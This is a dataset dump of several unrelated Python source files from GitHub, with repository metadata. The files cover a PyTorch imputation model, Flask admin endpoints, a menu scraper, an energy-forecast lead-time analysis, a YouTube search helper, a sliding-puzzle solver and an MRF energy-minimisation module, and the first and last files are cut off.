time_last = torch.stack(time_last_list)\r\n time_next = torch.stack(time_next_list)\r\n x_last = torch.stack(x_last_list)\r\n x_next = torch.stack(x_next_list)\r\n time = utils.hdl_time(time, self.input_v_size)\r\n time_last = utils.hdl_time(time_last, self.input_v_size)\r\n time_next = utils.hdl_time(time_next, self.input_v_size)\r\n if self.task == 'Prediction':\r\n time = utils.hdl_time(time, self.input_v_size)\r\n\r\n # 1.Embedding\r\n Ex = self.Emb(f_idx, x, time) # b x seq_len x input_v_size\r\n\r\n # 2.Similar Patients Discovery\r\n adj_matrix_out, Ex_all, ebase = self.Sim(Ex, xbase)\r\n if self.task == 'Imputation':\r\n ebase = ebase.unsqueeze(1).expand(ebase.shape[0], Ex.shape[1], ebase.shape[1])\r\n Ex = torch.cat((Ex, ebase), 2)\r\n x_self = Ex\r\n x_other = self.Gcn(Ex, adj_matrix_out)\r\n x_final = self.Agg(x_self, x_other)\r\n Ex_last = self.Emb_last(None, x_last, time_last)\r\n Ex_next = self.Emb_next(None, x_next, time_next)\r\n x_cmb = torch.cat((Ex_last, Ex_next), 2)\r\n # 3.Prediction\r\n output = self.W1(x_final) + self.W2(x_cmb)\r\n if self.task == 'Prediction':\r\n x_self = Ex_all\r\n x_other = self.Gcn(Ex_all, adj_matrix_out)\r\n x_final = self.Agg(x_self, x_other)\r\n x_final = self.dropout(x_final)\r\n # 3.Prediction\r\n output = self.softmax(self.Wy(x_final))\r\n\r\n return output, x_final\r\n\r\n\r\nclass CLLoss(nn.Module):\r\n def __init__(self, temperature=0.07, contrast_mode='all',\r\n base_temperature=0.07):\r\n super(CLLoss, self).__init__()\r\n self.temperature = temperature\r\n self.contrast_mode = contrast_mode\r\n self.base_temperature = base_temperature\r\n\r\n def forward(self, features, labels=None, mask=None):\r\n if len(features.shape) < 3:\r\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\r\n 'at least 3 dimensions are required')\r\n if len(features.shape) > 3:\r\n features = features.view(features.shape[0], features.shape[1], -1)\r\n\r\n batch_size = features.shape[0]\r\n if labels is not None and mask is not None:\r\n raise ValueError('Cannot define both `labels` and `mask`')\r\n elif labels is None and mask is None:\r\n mask = torch.eye(batch_size, dtype=torch.float32).to(utils.device)\r\n elif labels is not None:\r\n labels = labels.contiguous().view(-1, 1)\r\n if labels.shape[0] != batch_size:\r\n raise ValueError('Num of labels does not match num of features')\r\n mask = torch.eq(labels, labels.T).float().to(utils.device)\r\n else:\r\n mask = mask.float().to(utils.device)\r\n\r\n contrast_count = features.shape[1]\r\n contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\r\n if self.contrast_mode == 'one':\r\n anchor_feature = features[:, 0]\r\n anchor_count = 1\r\n elif self.contrast_mode == 'all':\r\n anchor_feature = contrast_feature\r\n anchor_count = contrast_count\r\n else:\r\n raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\r\n\r\n anchor_dot_contrast = torch.div(\r\n torch.matmul(anchor_feature, contrast_feature.T),\r\n self.temperature)\r\n\r\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\r\n logits = anchor_dot_contrast - logits_max.detach()\r\n\r\n mask = mask.repeat(anchor_count, contrast_count)\r\n logits_mask = torch.scatter(\r\n torch.ones_like(mask),\r\n 1,\r\n torch.arange(batch_size * anchor_count).view(-1, 1).to(utils.device),\r\n 0\r\n )\r\n mask = mask * logits_mask\r\n\r\n exp_logits = torch.exp(logits) * logits_mask\r\n tmp = exp_logits.sum(1, keepdim=True)\r\n tmp = torch.where(tmp==0,torch.zeros(tmp.shape).to(utils.device).float()+1e-3,tmp)\r\n log_prob = logits - torch.log(tmp)\r\n\r\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\r\n\r\n loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\r\n loss = loss.view(anchor_count, batch_size).mean()\r\n\r\n return loss\r\n","repo_name":"liulab1356/CL-ImpPreNet","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2781557795","text":"'''\n@Author: hua\n@Date: 2019-06-11 14:59:11\n@description: \n@LastEditors: hua\n@LastEditTime: 2019-12-12 14:37:09\n'''\nfrom app import app,CONST\nfrom app.Vendor.Decorator import validator\nfrom app.Vendor.UsersAuthJWT import UsersAuthJWT\nfrom app.Admin.Controllers.BaseController import BaseController\nfrom app.Vendor.Decorator import transaction\nfrom app.Models.Admin import Admin\nfrom app.Admin.Service.AdminService import AdminService\nfrom sqlalchemy import or_\n\n@app.route('/api/v2/admin/list', methods=['POST'])\n@validator(name=\"page_no\", rules={'type': 'integer'}, default=0)\n@validator(name=\"per_page\", rules={'type': 'integer'}, default=15)\n@validator(name=\"keyword\", rules={'type': 'string'})\n@validator(name=\"orderBy\", rules={'type': 'string'}, default='update_time')\n@validator(name=\"order\", rules={'type': 'string'}, default='desc')\n@UsersAuthJWT.AdminApiAuth\ndef adminList(*args, **kwargs):\n \"\"\" 获取管理员列表 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.name.like('%'+params['keyword']+'%'),\n or_(Admin.mobile.like('%'+params['keyword']+'%')),\n or_(Admin.email.like('%'+params['keyword']+'%'))\n }\n data = Admin().getList(filters,params['orderBy']+\" \"+params['order'],(),params['page_no'], params['per_page'])\n return BaseController().successData(data)\n\n@app.route('/api/v2/admin/delete', methods=['GET'])\n@validator(name=\"id\", rules={'type': 'string'}, default=0)\n@UsersAuthJWT.AdminApiAuth\n@transaction\ndef adminDelete(*args, **kwargs):\n \"\"\" 删除管理员 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.id == params['id']\n }\n Admin().delete(filters)\n return BaseController().successData()\n\n@app.route('/api/v2/admin/add', methods=['POST'])\n@validator(name=\"name\", rules={'type': 'string'}, default='')\n@validator(name=\"pwd\", rules={'type': 'string'}, default='')\n@UsersAuthJWT.AdminApiAuth\ndef adminAdd(*args, **kwargs):\n \"\"\" 增加管理员 \"\"\"\n params = kwargs['params']\n data = AdminService().add(params)\n if data['error_code'] != CONST['CODE']['SUCCESS']['value']:\n return BaseController().json(data)\n return BaseController().successData()\n\n@app.route('/api/v2/admin/edit', methods=['POST'])\n@validator(name=\"id\", rules={'type': 'integer'}, default='')\n@validator(name=\"pwd\", rules={'type': 'string'}, default='')\n@UsersAuthJWT.AdminApiAuth\n@transaction\ndef adminEdit(*args, **kwargs):\n \"\"\" 修改管理员密码 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.id == params['id']\n }\n AdminService().edit(params, filters)\n return BaseController().successData()\n","repo_name":"huaSoftware/chat","sub_path":"chatApi/app/Admin/Controllers/AdminController.py","file_name":"AdminController.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"8205571748","text":"import requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\ndef menza():\n\n\tpage = requests.get('http://www.kam.vutbr.cz/?p=menu&provoz=5')\n\n\tsoup = BeautifulSoup(page.content, \"lxml\")\n\n\tmenu = soup.find_all(\"table\", class_=\"htab\")\n\t#print(menu[0].encode('utf-8').strip())\n\tres = {\"menu\" : {\"start_date\" : \"\",\n\t\t\t\"end_date\" : \"\",\n\t\t\t\"dishes\" : []\n\t\t\t}}\n\n\tfor row in menu[0].find_all(\"tr\"):\n\t\tname = row.find(\"td\", class_=\"levyjid\")\n\t\tres['menu'][\"dishes\"].append({\"dish\" : {\n\t\t\t\"name\" : name.get_text()\n\t\t\t}})\n\n\treturn res\n\nif __name__ == \"__main__\":\n\tprint(menza())\n","repo_name":"petrstehlik/food","sub_path":"menza.py","file_name":"menza.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24409709323","text":"\"\"\"\nLead time analysis for residual load, wind production, spv production and consumption:\n\nThe user decides what forecast to use as benchmark forecast and what intraday forecast to use.\nThe user also defines what issue date to look at from the benchmark forecast, the timestamp of interest (data time) and\nthe time delta (how far back to look).\nThis code then subtracts the estimated residual load, wind production, spv production and consumption from the benchmark\nforecast with the intraday forecast. This way we can investigate how the intraday forecast differs from the\nbenchmark forecast for each release (each 15 min).\n\n\nUsed libraries:\nvolue_insight_timeseries: A library from volue used to access Volue Insight's API. To install, run: pip install\nvolue-insight-timeseries.\npandas: A python library used to handle data. To install, run pip install pandas\nos: Functionalities for interacting with the operating system. This is a standard python library,\n so no installation is needed.\nplotly.express: A module from plotly containing functions used to create graph plots. To install, run\n pip install plotly\nplotly.graph_objects: Another module of the plotly library used to create plots.\n\n\n# User defined inputs:\n# area: The area of interest, eg. DE, PL etc.\n# benchmark_forecast: 'ec00', 'ec12', 'entsoe_da' or 'entsoe_intraday'\n# intraday_forecast: 'intraday' or 'intraday_lastec'\n# issue_date: The date where the benchmark-curve (instance curve) was issued.\n# time_delta: Defines how many hours of the intraday curve (absolute curve) that is to be retrieved.\n# data_time: The timestamp of the forecasted value.\n\n\"\"\"\nfrom volue_insight_timeseries import Session\nimport pandas as pd\nimport os\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# ***********************************\n# User defined inputs:\narea = \"DE\"\nbenchmark_forecast = \"ec00\"\nintraday_forecast = \"intraday\"\nissue_date = \"2023-11-26T00:00\"\ntime_delta = 12\ndata_time = \"2023-11-27T10:00\"\n# ***********************************\n\n\ndef get_input_data(\n benchmark_forecast: str, intraday_forecast: str, area: str\n) -> tuple:\n \"\"\"This function maps the user inputs to available forecasts.\n\n Args:\n benchmark_forecast: User defined benchmark forecast\n intraday_forecast: User defined intraday forecast\n area: User defined area\n\n Returns:\n tuple: Two dictionaries containing curve names are returned as a tuple.\n \"\"\"\n tz = timezone_mapping(area)\n curve_dict = {\n \"ec00\": {\n \"wnd\": f\"pro {area} wnd ec00 mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv ec00 mwh/h {tz} min15 f\",\n \"con\": f\"con {area} ec00 mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} ec00 mwh/h {tz} min15 f\",\n },\n \"ec12\": {\n \"wnd\": f\"pro {area} wnd ec12 mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv ec12 mwh/h {tz} min15 f\",\n \"con\": f\"con {area} ec12 mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} ec12 mwh/h {tz} min15 f\",\n },\n \"entsoe_da\": {\n \"wnd\": f\"pro {area} wnd da entso-e mwh/h {tz} h f\",\n \"spv\": f\"pro {area} spv da entso-e mwh/h {tz} h f\",\n \"con\": f\"con {area} da entso-e mwh/h {tz} h f\",\n \"rdl\": f\"rdl {area} da entso-e mwh/h {tz} h f\",\n },\n \"entsoe_intraday\": {\n \"wnd\": f\"pro {area} wnd intraday entso-e mwh/h {tz} h f\",\n \"spv\": f\"pro {area} spv intraday entso-e mwh/h {tz} h f\",\n \"con\": f\"con {area} intraday entso-e mwh/h {tz} h f\",\n \"rdl\": f\"rdl {area} intraday entso-e mwh/h {tz} h f\",\n },\n \"multi-source_forecast\": {\n \"wnd\": f\"pro {area} wnd intraday mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv intraday mwh/h {tz} min15 f\",\n \"con\": f\"con {area} intraday mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} intraday mwh/h {tz} min15 f\",\n },\n \"intraday_lastec\": {\n \"wnd\": f\"pro {area} wnd intraday lastec mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv intraday lastec mwh/h {tz} min15 f\",\n \"con\": f\"con {area} intraday lastec mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} intraday mwh/h {tz} min15 f\",\n },\n }\n return curve_dict[benchmark_forecast], curve_dict[intraday_forecast]\n\n\ndef getkey() -> Session:\n \"\"\"This function configures Session from volue_insight_timeseries with local environment variable \"WAPI_INI_READ\"\n to allow for connection to Volue Insight's API.\n\n Returns:\n session (volue_insight_timeseries.session.Session): A session object that can\n communicate with Volue Insight's API.\n \"\"\"\n\n config = os.getenv(\"WAPI_INI_READ\")\n session = Session(config_file=config)\n return session\n\n\ndef get_instance_curve(session: Session, curve_name: str, issue_date: str) -> pd.Series:\n \"\"\"This function retrieves the instance curve released at the determined issue date.\n Args:\n session: Session object to interact with Volue Insight's API.\n curve_name: The name of the curve that is to be retrieved as an instance curve.\n issue_date: The user defined date of issue for the instance curve.\n\n Returns:\n time_series_pandas: Curve data as a pandas time series.\n \"\"\"\n instance_curve = session.get_curve(name=curve_name)\n time_series = instance_curve.get_instance(issue_date=issue_date)\n time_series_pandas = time_series.to_pandas()\n return time_series_pandas\n\n\ndef get_absolute_curve(\n data_time: pd.Timestamp,\n session: Session,\n curve_name: str,\n delta_hours: pd.Timedelta,\n) -> pd.Series:\n \"\"\"This function retrieves the curve which displays how the forecasted value at timestamp \"data_time\" develops\n with each release (absolute curve).\n\n Args:\n data_time: The timestamp of the forecasted value.\n session: Session object to interact with Volue Insight's API.\n curve_name: The name of the curve that is to be retrieved as an absolute curve.\n delta_hours: A value that defines how many hours back from the timestamp of data_time to retrieve data.\n\n Returns:\n time_series_pandas: Absolute curve data as pandas time series.\n \"\"\"\n\n date_from = pd.Timestamp(data_time) - pd.Timedelta(hours=delta_hours)\n curve = session.get_curve(name=curve_name)\n time_series = curve.get_absolute(\n issue_date_from=date_from,\n issue_date_to=data_time,\n data_date=data_time,\n issue_frequency=\"MIN15\",\n )\n time_series_pandas = time_series.to_pandas()\n return time_series_pandas\n\n\ndef get_instance_data(\n instance_curves_names: dict, session: Session, issue_date: pd.Timestamp\n) -> pd.DataFrame:\n \"\"\"This function uses the get_instance_curve to retrieve the instance curve data from all benchmark curves,\n then maps it into a dataframe.\n\n Args:\n instance_curves_names: A dictionary containing all instance curve names (the benchmark curves).\n session: Session object to interact with Volue Insight's API.\n issue_date: The user defined date of issue for the instance curve.\n\n\n Returns:\n df: A dataframe containing all instance curve data from the benchmark curves.\n \"\"\"\n df = pd.DataFrame()\n for curve_name in instance_curves_names.values():\n instance_curve = get_instance_curve(\n curve_name=curve_name, session=session, issue_date=issue_date\n )\n instance_curve.name = map_name_to_label(instance_curve.name)\n df = pd.concat([df, instance_curve], axis=1)\n return df\n\n\ndef get_absolute_data(\n absolute_curves_names: str,\n session: Session,\n data_time: pd.Timestamp,\n time_delta: pd.Timedelta,\n) -> pd.DataFrame:\n \"\"\"This function uses the get_absolute_curve to retrieve the absolute curve data from all intraday curves,\n then maps it into a dataframe.\n\n Args:\n absolute_curves_names: A dictionary containing all absolute curve names (the intraday curves).\n session: Session object to interact with Volue Insight's API..\n data_time: The timestamp of the forecasted value.\n time_delta: Defines how many hours of the intraday curve that is to be retrieved.\n\n Returns:\n df: A dataframe containing all absolute curve data from the intraday curves.\n \"\"\"\n\n df = pd.DataFrame()\n\n for curve_name in absolute_curves_names.values():\n absolute_curve = get_absolute_curve(\n data_time=data_time,\n session=session,\n curve_name=curve_name,\n delta_hours=time_delta,\n )\n absolute_curve.name = map_name_to_label(absolute_curve.name)\n df = pd.concat([df, absolute_curve], axis=1)\n return df\n\n\ndef timezone_mapping(area: str) -> str:\n \"\"\"This function defines a timezone depending on the area input.\n\n Args:\n area: User defined area.\n\n Returns:\n str: The timezone displayed as a string.\n \"\"\"\n if area.upper() == \"TR\":\n return \"trt\"\n elif \"IE\" in area.upper():\n return \"wet\"\n else:\n return \"cet\"\n\n\ndef map_name_to_label(curve_name: str) -> str:\n \"\"\"This function matches one name from the defined dictionary below with an inputted curve name and returns\n a more readable name.\n\n Args:\n curve_name: A curve name, for instance: \"pro fr wnd ec00 mwh/h cet min15 f 2023-11-26T00:00:00+01:00\"\n\n Returns:\n str: A name from the dictionary generated in this function. Can be used as column names in a df.\"\n \"\"\"\n mapping = dict(\n spv=\"Spv production\",\n wnd=\"Wind production\",\n con=\"Consumption\",\n rdl=\"Residual load\",\n )\n return [mapping.get(name, \"Undefined\") for name in mapping if name in curve_name][0]\n\n\ndef create_dataframe(\n instance_curves_df: dict,\n absolute_curves_df: dict,\n area: str,\n data_time: pd.Timestamp,\n) -> pd.DataFrame:\n \"\"\"This function takes two dataframes as input, instance_curves_df and absolute_curves_df and subtracts each of\n the base forecasts' values at the data time timestamp from each value in the corresponding columns in the\n intraday dataframe.\n Args:\n instance_curves_df: A dataframe containing all retrieved data from all the benchmark curves.\n absolute_curves_df: A dataframe containing all retrieved data from all the intraday curves.\n area: The user defined area.\n data_time: The timestamp of the forecasted value.\n\n Returns:\n difference_curves: A dataframe containing the difference values between benchmark forecast and intraday\n forecast. Ready to be plotted.\n \"\"\"\n data_time_timezone = pd.Timestamp(data_time, tz=timezone_mapping(area))\n difference_curves = absolute_curves_df.sub(\n instance_curves_df.loc[data_time_timezone]\n ).dropna()\n\n # Multiply spv and wind production with -1 to align residual load curve with stacked bar plot\n difference_curves.loc[:, [\"Spv production\", \"Wind production\"]] *= -1\n return difference_curves\n\n\ndef plot_difference_curves(\n plot_data: pd.DataFrame,\n benchmark_forecast: str,\n intraday_forecast: str,\n area: str,\n):\n \"\"\"This function plots the data generated in create_dataframe. Production and consumption are plotted as bars,\n but residual load is plotted as a trace/line plot.\n\n Args:\n plot_data: A pandas dataframe containing the difference between the intraday forecast-values and the\n benchmark forecast-value.\n benchmark_forecast: The user defined benchmark forecast.\n intraday_forecast: The user defined intraday forecast.\n area: The user defined area.\n \"\"\"\n color_match = {\n \"Spv production\": \"turquoise\",\n \"Wind production\": \"palegreen\",\n \"Consumption\": \"green\",\n }\n\n fig = px.bar()\n\n for i in range(len(plot_data.columns)):\n column_name = plot_data.columns[i]\n column_data = plot_data.iloc[:, i]\n\n print(\"plotting:\", column_name)\n\n if column_name == \"Residual load\":\n fig.add_trace(\n go.Scatter(\n x=plot_data.index,\n y=column_data,\n mode=\"lines\",\n name=column_name,\n line=dict(color=\"red\"),\n )\n )\n else:\n fig.add_bar(\n x=plot_data.index,\n y=column_data,\n name=column_name,\n marker_color=color_match[column_name],\n )\n\n fig.update_layout(\n xaxis=dict(\n rangeslider=dict(visible=True),\n ),\n title=f\"Lead time analysis at time {data_time} for area: {area.upper()}. Benchmark forecast: {benchmark_forecast.upper()}. intraday forecast: {intraday_forecast.upper()}\",\n yaxis_title=\"Shift in MW\",\n xaxis_title=\"Time\",\n )\n fig.update_layout(title_font=dict(size=25))\n fig.show()\n print(\"Run successful\")\n\n\ndef main():\n \"\"\"This function runs through the main part of the code.\"\"\"\n\n instance_curves_names, absolute_curves_names = get_input_data(\n benchmark_forecast, intraday_forecast, area\n )\n session = getkey()\n instance_curves_df = get_instance_data(\n instance_curves_names=instance_curves_names,\n session=session,\n issue_date=issue_date,\n )\n absolute_curves_df = get_absolute_data(\n absolute_curves_names=absolute_curves_names,\n session=session,\n data_time=data_time,\n time_delta=time_delta,\n )\n plot_data = create_dataframe(\n instance_curves_df, absolute_curves_df, area=area, data_time=data_time\n )\n plot_difference_curves(plot_data, benchmark_forecast, intraday_forecast, area)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"volueinsight/volue-insight-timeseries","sub_path":"examples/intraday_examples/lead_time_analysis.py","file_name":"lead_time_analysis.py","file_ext":"py","file_size_in_byte":13925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16839890617","text":"from apiclient.discovery import build\nfrom database import Base\nfrom models import Song\nfrom config import YOUTUBE_API_VERSION, YOUTUBE_API_SERVICE_NAME, DEVELOPER_KEY\n\n\ndef convert(search_result):\n song_id = search_result['id']['videoId']\n title = search_result['snippet']['title']\n thumbnail_url = search_result['snippet']['thumbnails']['default']['url']\n s = Song(youtube_hash=song_id, title=title, thumbnail_url=thumbnail_url)\n return s\n\n\ndef youtube_search(target_name):\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\n\n search_response = youtube.search().list(\n q=target_name,\n part=\"id,snippet\",\n maxResults=15\n ).execute()\n\n response = search_response.get('items', [])\n videos = [convert(vid) for vid in response if vid['id']['kind'] =='youtube#video']\n return videos","repo_name":"Ladramhaiola/mb_kursach","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5831267283","text":"'''\r\n在一个 2 x 3 的板上(board)有 5 块砖瓦,用数字 1~5 来表示, 以及一块空缺用 0 来表示.\r\n\r\n一次移动定义为选择 0 与一个相邻的数字(上下左右)进行交换.\r\n\r\n最终当板 board 的结果是 [[1,2,3],[4,5,0]] 谜板被解开。\r\n\r\n给出一个谜板的初始状态,返回最少可以通过多少次移动解开谜板,如果不能解开谜板,则返回 -1 。\r\n\r\n示例:\r\n\r\n输入:board = [[1,2,3],[4,0,5]]\r\n输出:1\r\n解释:交换 0 和 5 ,1 步完成\r\n输入:board = [[1,2,3],[5,4,0]]\r\n输出:-1\r\n解释:没有办法完成谜板\r\n输入:board = [[4,1,2],[5,0,3]]\r\n输出:5\r\n解释:\r\n最少完成谜板的最少移动次数是 5 ,\r\n一种移动路径:\r\n尚未移动: [[4,1,2],[5,0,3]]\r\n移动 1 次: [[4,1,2],[0,5,3]]\r\n移动 2 次: [[0,1,2],[4,5,3]]\r\n移动 3 次: [[1,0,2],[4,5,3]]\r\n移动 4 次: [[1,2,0],[4,5,3]]\r\n移动 5 次: [[1,2,3],[4,5,0]]\r\n输入:board = [[3,2,4],[1,5,0]]\r\n输出:14\r\n提示:\r\n\r\nboard 是一个如上所述的 2 x 3 的数组.\r\nboard[i][j] 是一个 [0, 1, 2, 3, 4, 5] 的排列.\r\n'''\r\nfrom typing import List\r\n\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n '''\r\n BFS\r\n '''\r\n @printTime()\r\n def slidingPuzzle(self, board: List[List[int]]) -> int:\r\n cur = [[[1, 2, 3], [4, 5, 0]]]\r\n mem = [cur[0]]\r\n step = 0\r\n def getPosition(board):\r\n for i in range(2):\r\n for j in range(3):\r\n if board[i][j] == 0:\r\n return i, j\r\n return 0, 0\r\n def copy(board):\r\n temp = []\r\n for i in range(2):\r\n temp.append(board[i].copy())\r\n return temp\r\n while cur.__len__():\r\n if cur.__contains__(board):\r\n return step\r\n temp = []\r\n for c in cur:\r\n row, column = getPosition(c)\r\n if row == 1:\r\n t = copy(c)\r\n t[row][column], t[0][column] = t[0][column], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if row == 0:\r\n t = copy(c)\r\n t[row][column], t[1][column] = t[1][column], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if column > 0:\r\n t = copy(c)\r\n t[row][column], t[row][column - 1] = t[row][column - 1], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if column < 2:\r\n t = copy(c)\r\n t[row][column], t[row][column + 1] = t[row][column + 1], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n cur = temp\r\n step += 1\r\n return -1\r\nboard = [[3,2,4],[1,5,0]]\r\nSolution().slidingPuzzle(board)","repo_name":"CrzRabbit/Python","sub_path":"leetcode/0773_H_滑动谜题.py","file_name":"0773_H_滑动谜题.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31270702273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nfrom grid import Grid,determine_grid,row_column_decomposition\nimport numpy as np\nfrom collections import namedtuple\nimport copy\n\n\n#Exercise 3.1\n\ndef evaluate_energy(nodes, edges, assignment):\n\n\tenergy = 0\n\tfor i in range(len(nodes)):\n\t\tenergy = nodes[i].costs[assignment[i]] + energy\n\t\t\n\tfor j in range(len(edges)):\n\t\tenergy = edges[j].costs[assignment[edges[j].left],assignment[edges[j].right]] + energy\n\t\t\t\n\t\t\n\treturn energy\n\n#Random initialisation\ndef Rand_ini(nodes):\n\tlabeling=[]\n\tfor i in range(len(nodes)):\n\t\tlabeling.append(random.randint(0,len(nodes[i].costs)-1))\n\treturn labeling\n\n\ndef ICM_update_energy(Grid_,pos_node,Labeling,energy=0,prev_lab=None):\n\tif prev_lab==None:\n\t\tnew_energy=Grid_._nodes[pos_node].costs[Labeling[pos_node]]\n\t\tfor edge in Grid_.edges(pos_node,True):\n\t\t\tif edge.left==pos_node:\n\t\t\t\tnew_energy=new_energy+edge.costs[Labeling[pos_node],Labeling[edge.right]]\n\t\t\telse:\n\t\t\t\tnew_energy=new_energy+edge.costs[Labeling[edge.left],Labeling[pos_node]]\n\t\treturn new_energy\n\t\n\t\n\tnew_energy=energy-Grid_._nodes[pos_node].costs[prev_lab]+Grid_._nodes[pos_node].costs[Labeling[pos_node]]\n\t\n\tfor edge in Grid_.edges(pos_node,True):\n\t\tif edge.left==pos_node:\n\t\t\t\tnew_energy=new_energy-edge.costs[prev_lab,Labeling[edge.right]]+edge.costs[Labeling[pos_node],Labeling[edge.right]]\n\t\telse:\n\t\t\tnew_energy=new_energy-edge.costs[Labeling[edge.left],prev_lab]+edge.costs[Labeling[edge.left],Labeling[pos_node]]\n\treturn new_energy\n\n#ICM\ndef ICM(grid):\n\t#Random initialisation\n\tlabeling=Rand_ini(grid._nodes)\n\t\n\tupdate=True\n\tnodes_order=[x for x in range(len(grid._nodes))]\n\t\n\twhile update:\n\t\tupdate=False\n\t\trandom.shuffle(nodes_order)\n\t\tfor i in nodes_order:\n\t\t\tmin_lab=labeling[i]\n\t\t\tmin_energy=ICM_update_energy(grid,i,labeling)\n\t\t\tfor lab in range(len(grid._nodes[i].costs)):\n\t\t\t\tif lab!=min_lab:\n\t\t\t\t\tlabeling[i]=lab\n\t\t\t\t\tenergy=ICM_update_energy(Grid_=grid,pos_node=i,Labeling=labeling,energy=min_energy,prev_lab=min_lab)\n\t\t\t\t\tif energy<min_energy:\n\t\t\t\t\t\tupdate=True\n\t\t\t\t\t\tmin_lab=lab\n\t\t\t\t\t\tmin_energy=energy\n\t\t\tlabeling[i]=min_lab\n\treturn labeling\n\t\t\t\n\n\n\ndef dynamic_programming_tree(nodes,edges):\n\tF=[]\n\t\n\tfor i in range(len(nodes)):\n\t\tF.append(copy.deepcopy(nodes[i].costs))\n\t\n\t#Calculates edges associated with each node. Position i of the list correspond to the edges incident to vertex \n\t# i. Length of list of position i gives degree of i\n\tdegree_nodes=[[] for _ in range(len(nodes))]\n\tfor e in range(len(edges)):\n\t\tdegree_nodes[edges[e].left].append(e)\n\t\tdegree_nodes[edges[e].right].append(e)\n\t\t\n\tr=[np.zeros(len(nodes[i].costs)) for i in range(len(nodes))]\n\torder=[] #stores order of visited leaves and neighbour\n\twhile any(degree_nodes):\n\t\tedge_leave,leave,neighbour_leave=find_leave(degree_nodes,edges)\n\t\tdegree_nodes[leave]=None\n\t\tdegree_nodes[neighbour_leave].remove(edge_leave)\n\t\t\n\t\tfor s in range(np.size(F[neighbour_leave])):\n\t\t\tF_S=[]\n\t\t\tfor t in range(np.size(F[leave])):\n\t\t\t\tlabel_edge=(s,t)*(edges[edge_leave].left==neighbour_leave)+(t,s)*(edges[edge_leave].left==leave)\n\t\t\t\tF_S.append(F[leave][t]+edges[edge_leave].costs[label_edge])\n\t\t\tF[neighbour_leave][s]=F[neighbour_leave][s]+min(F_S)\n\t\t\tr[leave][s]=np.argmin(F_S)\n\t\torder.append((leave,neighbour_leave))\n\t\n\n\n\tintermediates=[F,r,order]\n\treturn(intermediates)\n\ndef find_leave(degree_nodes,edges):\n\tleave=-1\n\tfor i in degree_nodes:\n\t\tleave=leave+1\n\t\tif i!=None:\n\t\t\tif len(i)==1:\n\t\t\t\tneighbour_leave=(edges[i[0]].left!=leave)*edges[i[0]].left+(edges[i[0]].right!=leave)*edges[i[0]].right\n\t\t\t\tedge_leave=i[0]\n\t\t\t\n\t\t\t\treturn edge_leave,leave,neighbour_leave\n\treturn None,None,None\n\t\t\ndef backtrack_tree(nodes,edges,F,r,order):\n\tassignment=[0]*len(nodes)\n\tenergy_ls=[]\n\tleave=order[-1][-1]\n\tfor t in range(np.size(F[leave])):\n\t\tenergy_ls.append(F[leave][t])\n\tassignment[leave]=np.argmin(energy_ls)\n\t\n\tfor i in reversed(range(len(order))):\n\t\tassignment[order[i][0]]=int(r[order[i][0]][int(assignment[order[i][1]])])\n\n\t\n\treturn(assignment)\t\n\nNode = namedtuple('Node', 'costs')\nEdge = namedtuple('Edge', 'left right costs')\n\ndef create_aux_graph(sub_graph,labeling,grid):\n\tnodes = []\n\tedges = []\n\tset_edges_subgraph=set()\n\tfor edge in sub_graph:\n\t\tset_edges_subgraph.add((edge.left,edge.right))\n\t\n\tfor edge in sub_graph:\n\t\tcost=grid._nodes[edge.left].costs\n\t\tnode=edge.left\n\t\tneighbours=grid.edges(node,True)\n\t\tset_neighbours=set()\n\t\tfor edge_neigh in neighbours:\n\t\t\tset_neighbours.add((edge_neigh.left,edge_neigh.right))\n\t\tedges_node_not_subgraph=list(set_neighbours-set_edges_subgraph)\n\n\n\t\tcosts_new_graph=cost.copy()\n\t\tfor i in range(len(cost)):\n\t\t\tfor edge2 in neighbours:\n\t\t\t\tif (edge2.left,edge2.right) in edges_node_not_subgraph:\n\t\t\t\t\tif edge2.left==node:\n\t\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[i,labeling[edge2.right]] 